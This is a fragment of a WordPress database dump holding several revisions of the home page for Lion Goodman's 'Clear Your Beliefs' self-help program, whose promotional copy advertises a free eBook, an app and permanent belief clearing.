(1592, 2, '2014-10-23 19:02:12', '2014-10-24 00:02:12', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt&lt;/em, our free app.  \n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 19:02:12', '2014-10-24 00:02:12', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1597, 2, '2014-10-23 23:28:09', '2014-10-24 04:28:09', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 23:28:09', '2014-10-24 04:28:09', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1596, 2, '2014-10-23 23:24:58', '2014-10-24 04:24:58', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<h3 class="widget-title">script</h3>			alert(''qqq'')\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 23:24:58', '2014-10-24 04:24:58', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1598, 2, '2014-10-23 23:35:32', '2014-10-24 04:35:32', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align:center">\nDownload the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.\n</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 23:35:32', '2014-10-24 04:35:32', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1599, 2, '2014-10-23 23:42:11', '2014-10-24 04:42:11', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center;margin-top:50px;margin-bottom:0px">\nDownload the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.\n</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 23:42:11', '2014-10-24 04:42:11', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1600, 2, '2014-10-23 23:51:43', '2014-10-24 04:51:43', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center;margin-top:50px;margin-bottom:0px">\nDownload the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.\n</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 94px"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center;font-size: 14px;margin-bottom: 46px">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center;margin-bottom: -5px;margin-top: 87px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 23:51:43', '2014-10-24 04:51:43', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1602, 2, '2014-10-23 23:53:51', '2014-10-24 04:53:51', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 87px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 23:53:51', '2014-10-24 04:53:51', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
